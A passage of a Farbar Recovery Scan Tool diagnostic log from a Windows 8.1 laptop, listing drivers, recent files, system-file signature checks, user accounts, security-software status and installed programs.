R3 athr; C:\WINDOWS\system32\DRIVERS\athwbx.sys [3855872 2013-09-25] (Qualcomm Atheros Communications, Inc.)
R3 bcmsmbsp; C:\WINDOWS\System32\drivers\bcmsmbsp.sys [40152 2013-09-09] (Broadcom Corporation.)
R3 eamonm; C:\WINDOWS\System32\DRIVERS\eamonm.sys [262792 2016-11-30] (ESET)
R0 edevmon; C:\WINDOWS\System32\DRIVERS\edevmon.sys [199304 2016-11-30] (ESET)
S0 eelam; C:\WINDOWS\System32\DRIVERS\eelam.sys [15488 2016-06-23] (ESET)
R1 ehdrv; C:\WINDOWS\system32\DRIVERS\ehdrv.sys [197248 2016-11-30] (ESET)
R2 ekbdflt; C:\WINDOWS\system32\DRIVERS\ekbdflt.sys [153216 2016-11-30] (ESET)
R1 epfw; C:\WINDOWS\system32\DRIVERS\epfw.sys [208520 2016-11-30] (ESET)
R1 EpfwLWF; C:\WINDOWS\system32\DRIVERS\EpfwLWF.sys [61568 2016-11-30] (ESET)
R0 epfwwfp; C:\WINDOWS\System32\DRIVERS\epfwwfp.sys [84616 2016-11-30] (ESET)
S3 epmntdrv; C:\WINDOWS\system32\epmntdrv.sys [17480 2013-03-07] () [File not signed]
S3 epmntdrv; C:\WINDOWS\SysWOW64\epmntdrv.sys [13896 2013-03-07] () [File not signed]
S3 EuGdiDrv; C:\WINDOWS\system32\EuGdiDrv.sys [9800 2013-03-07] () [File not signed]
S3 EuGdiDrv; C:\WINDOWS\SysWOW64\EuGdiDrv.sys [9160 2013-03-07] () [File not signed]
S3 ewusbnet; C:\WINDOWS\system32\DRIVERS\ewusbnet.sys [256000 2015-11-10] (Huawei Technologies Co., Ltd.)
R0 fsbts; C:\WINDOWS\System32\Drivers\fsbts.sys [75448 2016-05-12] ()
R2 PEGAGFN; C:\Program Files (x86)\TOSHIBA\PasswordUtility\PEGAGFN.sys [14344 2009-09-12] (PEGATRON)
S3 ptun0901; C:\WINDOWS\system32\DRIVERS\ptun0901.sys [27136 2016-04-21] (The OpenVPN Project)
S3 SliceDisk5; C:\Program Files\A-FF Find and Mount\slicedisk-x64.sys [31824 2011-02-25] (Atola) [File not signed]
S3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [34544 2013-08-22] (Synaptics Incorporated)
R0 THAccel; C:\WINDOWS\System32\DRIVERS\THAccel.sys [111488 2013-10-16] (TOSHIBA Corporation)
R3 Thotkey; C:\WINDOWS\System32\drivers\Thotkey.sys [33168 2013-10-10] (Windows ® Win 7 DDK provider)
R3 TuneUpUtilitiesDrv; C:\Program Files (x86)\AVG\AVG PC TuneUp\TuneUpUtilitiesDriver64.sys [32304 2016-02-16] (AVG Netherlands B.V.)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [88592 2014-01-16] (Intel Corporation)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-02] ()
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [35856 2013-10-31] (Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [236888 2013-10-31] (Microsoft Corporation)
S3 wdf_usb; C:\WINDOWS\system32\drivers\usb2ser.sys [67192 2011-05-20] (MediaTek Inc.)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [124760 2013-10-31] (Microsoft Corporation)
S3 dpclat_driver; \??\C:\WINDOWS\system32\drivers\dpclat_driver.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-12-02 01:55 - 2016-12-02 01:55 - 00000000 ____D C:\FRST
2016-12-02 01:51 - 2016-12-02 01:51 - 00001104 _____ C:\Users\Public\Desktop\Revo Uninstaller Pro.lnk
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\VS Revo Group
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\ProgramData\VS Revo Group
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller Pro
2016-12-02 01:51 - 2016-12-02 01:51 - 00000000 ____D C:\Program Files\VS Revo Group
2016-12-02 01:51 - 2009-12-30 11:21 - 00031800 _____ (VS Revo Group) C:\WINDOWS\system32\Drivers\revoflt.sys
2016-12-01 22:13 - 2016-12-01 22:19 - 00000261 ____H C:\Users\Ptr. Julius Lampao\Desktop\test.txt
2016-12-01 20:16 - 2016-12-01 22:13 - 00000526 ____H C:\Users\Ptr. Julius Lampao\Desktop\FB2Test.bat
2016-11-30 18:06 - 2016-11-30 18:06 - 00153216 _____ (ESET) C:\WINDOWS\system32\Drivers\ekbdflt.sys
2016-11-29 10:55 - 2016-11-30 10:39 - 04757497 _____ C:\Users\Ptr. Julius Lampao\Desktop\14TH MENS FEL.pptx
2016-11-27 23:13 - 2016-11-27 23:14 - 00001261 _____ C:\Users\Ptr. Julius Lampao\Desktop\FacebookShortCut.lnk
2016-11-27 23:12 - 2016-12-01 22:31 - 00000780 _____ C:\Users\Ptr. Julius Lampao\Documents\FB2.bat
2016-11-27 23:05 - 2016-11-27 23:07 - 00000084 _____ C:\Users\Ptr. Julius Lampao\Documents\FBChat.bat
2016-11-27 23:05 - 2016-11-27 23:05 - 00000412 _____ C:\Users\Ptr. Julius Lampao\Documents\fb.bat
2016-11-26 15:26 - 2016-11-26 15:40 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\thanksgiving, 2016
2016-11-26 09:04 - 2016-11-26 09:10 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Dream Aquarium
2016-11-26 07:51 - 2016-11-26 08:16 - 00060211 _____ C:\Users\Ptr. Julius Lampao\Documents\worship song..pptx
2016-11-25 16:54 - 2016-11-30 21:07 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\ViberPC
2016-11-25 16:54 - 2016-11-26 10:40 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Viber
2016-11-25 16:54 - 2016-11-25 16:54 - 00000992 _____ C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Viber.lnk
2016-11-25 16:54 - 2016-11-25 16:54 - 00000990 _____ C:\Users\Ptr. Julius Lampao\Desktop\Viber.lnk
2016-11-25 16:54 - 2016-11-25 16:54 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Viber
2016-11-25 16:54 - 2016-11-25 16:54 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Package Cache
2016-11-21 00:55 - 2016-11-21 00:55 - 00000196 _____ C:\Users\Ptr. Julius Lampao\Documents\jhgfcghjk.txt
2016-11-19 23:57 - 2016-11-19 23:59 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
2016-11-12 05:51 - 2016-11-12 05:51 - 00000028 _____ C:\Users\Ptr. Julius Lampao\Downloads\link.txt
2016-11-08 17:07 - 2016-11-08 18:06 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\Corel VideoStudio Pro
2016-11-08 17:05 - 2016-11-08 21:17 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Ulead Systems
2016-11-08 17:02 - 2016-11-08 17:07 - 00000000 ____D C:\ProgramData\Protexis64
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Corel
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Haali Media Splitter
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Program Files (x86)\Haali
2016-11-08 17:02 - 2016-11-08 17:02 - 00000000 ____D C:\Program Files (x86)\Corel
2016-11-08 16:57 - 2016-11-08 16:57 - 00001980 _____ C:\Users\Public\Desktop\VidеоStudiо Х9 Тrаining.lnk
2016-11-08 16:57 - 2016-11-08 16:57 - 00000000 ____D C:\Program Files\Common Files\Protexis
2016-11-08 16:56 - 2016-11-08 16:57 - 00000000 ____D C:\ProgramData\Corel
2016-11-08 16:54 - 2016-11-08 16:54 - 00001015 _____ C:\Users\Public\Desktop\Corel VideoStudio X9.lnk
2016-11-08 16:54 - 2016-11-08 16:54 - 00001015 _____ C:\Users\Public\Desktop\Corel FastFlick X9.lnk
2016-11-08 16:54 - 2016-11-08 16:54 - 00001010 _____ C:\Users\Public\Desktop\Corel ScreenCap X9.lnk
2016-11-08 16:54 - 2016-11-08 16:54 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Corel VideoStudio X9
2016-11-08 16:52 - 2016-11-08 16:52 - 00000000 ____D C:\Program Files\Corel
2016-11-08 15:42 - 2016-11-08 15:42 - 00000000 ____D C:\ProgramData\UniqueId
2016-11-08 15:33 - 2016-11-08 15:33 - 00017292 _____ C:\Users\Ptr. Julius Lampao\Documents\piougyfghj.txt
2016-11-05 14:28 - 2016-11-05 14:28 - 00000892 _____ C:\Users\Ptr. Julius Lampao\Desktop\Internet Download Manager.lnk
2016-11-05 14:28 - 2016-11-05 14:28 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
2016-11-05 14:28 - 2016-11-05 14:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Internet Download Manager
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-12-02 02:00 - 2016-07-07 22:00 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\CrashDumps
2016-12-02 01:49 - 2014-12-10 04:04 - 00003970 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{396F5124-4C87-4957-8CE7-D1626169AA55}
2016-12-02 01:39 - 2014-12-02 14:16 - 00000000 ____D C:\Users\Ptr. Julius Lampao
2016-12-02 01:30 - 2015-08-29 06:08 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\choral 2015
2016-12-02 01:30 - 2014-12-12 10:20 - 00003758 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2016-12-02 01:25 - 2016-01-21 09:03 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\DMCache
2016-12-02 01:16 - 2016-10-15 20:16 - 00000933 _____ C:\WINDOWS\Tasks\EPSON L220 Series Update {441D2E96-17AE-4DAF-957A-A09CD9765B46}.job
2016-12-01 20:23 - 2016-01-21 09:03 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\IDM
2016-12-01 19:25 - 2016-07-14 19:27 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\Men's
2016-12-01 19:22 - 2015-10-30 23:44 - 00003894 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-12-01 19:22 - 2015-10-30 23:44 - 00003658 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-12-01 19:22 - 2015-10-30 23:44 - 00000920 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-12-01 19:22 - 2015-10-30 23:44 - 00000916 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-12-01 17:02 - 2016-01-21 09:08 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\vlc
2016-11-30 18:55 - 2013-08-22 22:45 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-11-30 18:55 - 2013-08-22 21:36 - 00000000 ____D C:\WINDOWS\Inf
2016-11-30 18:54 - 2013-08-22 21:25 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-11-30 18:06 - 2016-06-23 14:31 - 00061568 _____ (ESET) C:\WINDOWS\system32\Drivers\EpfwLWF.sys
2016-11-30 18:06 - 2014-09-18 12:38 - 00084616 _____ (ESET) C:\WINDOWS\system32\Drivers\epfwwfp.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00262792 _____ (ESET) C:\WINDOWS\system32\Drivers\eamonm.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00208520 _____ (ESET) C:\WINDOWS\system32\Drivers\epfw.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00199304 _____ (ESET) C:\WINDOWS\system32\Drivers\edevmon.sys
2016-11-30 18:06 - 2014-08-18 10:28 - 00197248 _____ (ESET) C:\WINDOWS\system32\Drivers\ehdrv.sys
2016-11-30 15:52 - 2015-04-02 17:42 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\HYMNAL
2016-11-30 15:34 - 2016-04-02 18:30 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Desktop\songs
2016-11-30 11:49 - 2016-01-21 15:28 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Bibletime
2016-11-30 08:19 - 2016-04-21 21:08 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Roaming\Skype
2016-11-30 08:19 - 2015-10-19 23:24 - 00000000 ____D C:\Program Files (x86)\Tonec
2016-11-29 23:14 - 2013-12-09 19:36 - 00863592 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-11-28 09:13 - 2015-10-13 17:10 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\ElevatedDiagnostics
2016-11-27 21:12 - 2014-12-02 14:22 - 00003600 _____ C:\WINDOWS\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1061507693-3713582409-3664479191-1001
2016-11-26 11:28 - 2015-03-25 22:25 - 00000000 ____D C:\ProgramData\CanonIJPLM
2016-11-22 02:10 - 2014-12-02 14:16 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Packages
2016-11-20 23:39 - 2013-08-22 23:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-11-20 23:39 - 2013-08-22 23:36 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-11-20 19:56 - 2016-09-26 22:35 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Downloads\SHAREit
2016-11-17 23:24 - 2013-08-22 23:36 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-11-17 20:23 - 2015-06-21 22:02 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\English 6
2016-11-17 11:59 - 2015-04-12 20:08 - 00004478 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2016-11-17 11:42 - 2015-09-12 15:39 - 00000000 ____D C:\WINDOWS\Minidump
2016-11-17 11:42 - 2013-08-22 22:44 - 00574008 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-11-16 23:46 - 2016-09-21 12:29 - 00003600 _____ C:\WINDOWS\System32\Tasks\AVG EUpdate Task
2016-11-11 18:16 - 2015-06-21 22:04 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Documents\Math 6
2016-11-08 16:51 - 2014-02-08 11:54 - 00000000 ____D C:\ProgramData\Package Cache
2016-11-08 13:31 - 2016-10-19 23:09 - 00000000 ____D C:\Users\Ptr. Julius Lampao\AppData\Local\Windows Live
2016-11-04 23:17 - 2016-10-29 21:28 - 00000000 ____D C:\Users\Ptr. Julius Lampao\Downloads\files
2016-11-02 13:19 - 2016-03-01 13:56 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
 
==================== Files in the root of some directories =======
 
2014-12-10 03:06 - 2004-07-30 08:56 - 0090112 _____ () C:\Program Files (x86)\Common Files\PCSBclean.exe
2014-12-10 03:06 - 2004-07-26 14:30 - 0291840 _____ () C:\Program Files (x86)\Common Files\PCSBoff.exe
2016-07-19 01:18 - 2016-08-09 20:16 - 0000132 _____ () C:\Users\Ptr. Julius Lampao\AppData\Roaming\Adobe PNG Format CC Prefs
2016-08-04 22:41 - 2016-08-04 22:43 - 0341504 _____ () C:\Users\Ptr. Julius Lampao\AppData\Roaming\wsrv_f8869065.dat
2016-10-03 19:10 - 2016-10-03 19:10 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{0441AFAA-FDAF-4605-BF71-40BE2F336494}
2016-10-08 17:44 - 2016-10-08 17:44 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{0A7739D2-4DF1-4CEF-B71B-40D21A823889}
2016-10-02 16:43 - 2016-10-02 16:43 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{4442C9CD-07EF-446A-9982-69402F2EC4B7}
2016-06-05 15:11 - 2016-06-05 15:11 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{465D4095-6B8E-4DE1-BDD8-20EEA3A57C49}
2015-07-01 20:51 - 2015-07-01 20:51 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{76638D49-B073-48B3-8725-4D75677A6AA4}
2015-07-01 20:51 - 2015-07-01 20:51 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{76F76F48-DFA6-48B3-964E-AF594BD66012}
2016-06-04 13:28 - 2016-06-04 13:28 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{8E6B0E3F-C487-4A3F-BE1E-8FF8837B9B43}
2016-10-05 13:02 - 2016-10-05 13:02 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{B264875B-AF39-4B7F-97DE-DCE34DBD0B1E}
2016-10-07 16:34 - 2016-10-07 16:34 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{BBC5CA8C-0D54-454C-A8A8-A604ED457799}
2016-10-06 16:10 - 2016-10-06 16:10 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{BD578060-BAA7-4629-8B58-DB15B706B92A}
2016-06-06 20:18 - 2016-06-06 20:18 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{CCF83A90-ABC0-4067-BDCD-1A2C55BB7471}
2016-06-04 13:28 - 2016-06-04 13:28 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{D2C4B430-55FD-4A38-9609-D3CFA32F320D}
2016-10-03 19:10 - 2016-10-03 19:10 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{D9490B89-A21D-4FFF-AA26-F756E2B7CF35}
2016-04-07 19:33 - 2016-04-07 19:33 - 0000000 _____ () C:\Users\Ptr. Julius Lampao\AppData\Local\{F6594D30-1DF8-4558-A65A-27566DC8CAE7}
2014-02-08 11:39 - 2014-02-08 11:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2016-02-28 19:54 - 2016-02-28 19:54 - 0010218 _____ () C:\ProgramData\regid.2015-05.exe.textpad_83F5EF12-C2F9-4C11-A5C5-57A7B2D7AD25.swidtag
 
Files to move or delete:
====================
C:\Users\Ptr. Julius Lampao\cnmss Canon iP2700 series (Local).dll
 
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-11-28 09:13
 
==================== End of FRST.txt ============================
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2016
Ran by Ptr. Julius Lampao (02-12-2016 02:00:58)
Running from C:\Users\Ptr. Julius Lampao\Downloads\Programs
Windows 8.1 (Update) (X64) (2014-12-02 06:16:42)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1061507693-3713582409-3664479191-500 - Administrator - Disabled)
Guest (S-1-5-21-1061507693-3713582409-3664479191-501 - Limited - Disabled)
John Doe (S-1-5-21-1061507693-3713582409-3664479191-1002 - Limited - Enabled)
Ptr. Julius Lampao (S-1-5-21-1061507693-3713582409-3664479191-1001 - Administrator - Enabled) => C:\Users\Ptr. Julius Lampao

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: ESET Smart Security 9.0.408.0 (Enabled - Up to date) {EC1D6F37-E411-475A-DF50-12FF7FE4AC70}
AS: ESET Smart Security 9.0.408.0 (Enabled - Up to date) {577C8ED3-C22B-48D4-E5E0-298D0463E6CD}
AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: ESET Personal firewall (Enabled) {D426EE12-AE7E-4602-F40F-BBCA8137EB0B}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Adobe Reader XI (11.0.03) MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.18) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.18 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\AmUStor) (Version: 4.8.1245.73583 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 4.8.1245.73583 - Alcor Micro Corp.) Hidden
Angry Birds Rio (HKLM-x32\...\{4933D2E2-B621-487F-A7E7-96DA7312BCFE}) (Version: 1.3.2 - Rovio)
Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Driver Installation Program (HKLM-x32\...\{C3A32068-8AB1-4327-BB16-BED9C6219DC7}) (Version: 10.0 - Atheros)
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.62.2.46691 - AVG Technologies)
AVG PC TuneUp (x32 Version: 16.62.4 - AVG Technologies) Hidden
Bejeweled 3 (x32 Version: 2.2.0.97 - WildTangent) Hidden
BibleTime for Windows (HKLM-x32\...\BibleTime) (Version: 2.6.1 - hxxp://www.bibletime.info)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 4.1.0 - Canon Inc.)
Canon iP2700 series Printer Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_iP2700_series) (Version: - Canon Inc.)
Canon Utilities Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version: - )
Canon Utilities My Printer (HKLM-x32\...\CanonMyPrinter) (Version: - )
Canon Utilities Solution Menu (HKLM-x32\...\CanonSolutionMenu) (Version: - )
Contents64 (Version: 19.5.0.35 - Corel Corporation) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Dream Aquarium (HKLM-x32\...\Dream Aquarium) (Version: - )
EaseUS Partition Master 9.2.2 (HKLM-x32\...\EaseUS Partition Master_is1) (Version: - EaseUS)
EPSON L220 Series Printer Uninstall (HKLM\...\EPSON L220 Series) (Version: - SEIKO EPSON Corporation)
EPSON Manuals (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.40.0.0 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{B4F0E794-11F5-4971-85EC-6D7F2E4DAC68}) (Version: 4.4.3 - SEIKO EPSON CORPORATION)
ESET Smart Security (HKLM\...\{C20E6525-879A-47C3-BBC4-6B8096D3F53D}) (Version: 9.0.386.0 - ESET, spol. s r.o.)
Find and Mount 2.32 (HKLM\...\Find and Mount_is1) (Version: 2.32 - A-FF Data Recovery)
FMW 1 (Version: 1.132.1 - AVG Technologies) Hidden
Foxit PhantomPDF Business (HKLM-x32\...\{8A601904-4113-40FE-9DCC-7A38CE1A8032}) (Version: 7.0.6.1126 - Foxit Software Inc.)
Globe Tattoo Broadband (HKLM-x32\...\Globe Tattoo Broadband) (Version: 21.005.11.00.158 - Huawei Technologies Co.,Ltd)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 54.0.2840.99 - Google Inc.)
Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden
Haali Media Splitter (HKLM-x32\...\HaaliMkx) (Version: - )
HP Deskjet 1510 series Basic Device Software (HKLM\...\{D17E60E8-478A-4D4A-8147-21D481B5CA55}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
ICA (x32 Version: 19.5.0.35 - Corel Corporation) Hidden
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1050 - Intel Corporation)
Internet Download Manager (HKLM-x32\...\Internet Download Manager) (Version: - Tonec Inc.)
IPM_VS_Pro64 (Version: 19.0 - Corel Corporation) Hidden
Java 8 Update 73 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
Java SE Development Kit 7 Update 79 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0170790}) (Version: 1.7.0.790 - Oracle)
Kits Configuration Installer (x32 Version: 8.100.25984 - Microsoft) Hidden
Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden
Microsoft Encarta Premium 2009 (HKLM-x32\...\{09040081-2C94-4A67-8E55-8483C019C7D2}) (Version: 2009 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{d07b0db5-8dad-40e1-be90-88026298a46b}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{2749c485-3a8b-4533-92ff-7cf6e8221cff}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 35.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 35.0 (x86 en-US)) (Version: 35.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 35.0 - Mozilla)
NetBeans IDE 8.0.2 (HKLM\...\nbi-nb-base-8.0.2.0.201411181905) (Version: 8.0.2 - NetBeans.org)
Outils de vérification linguistique 2013 de Microsoft Office - Français (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
PC Study Bible (remove only) (HKLM-x32\...\PC Study Bible) (Version: - )
Plants vs. Zombies - Game of the Year (x32 Version: 2.2.0.98 - WildTangent) Hidden
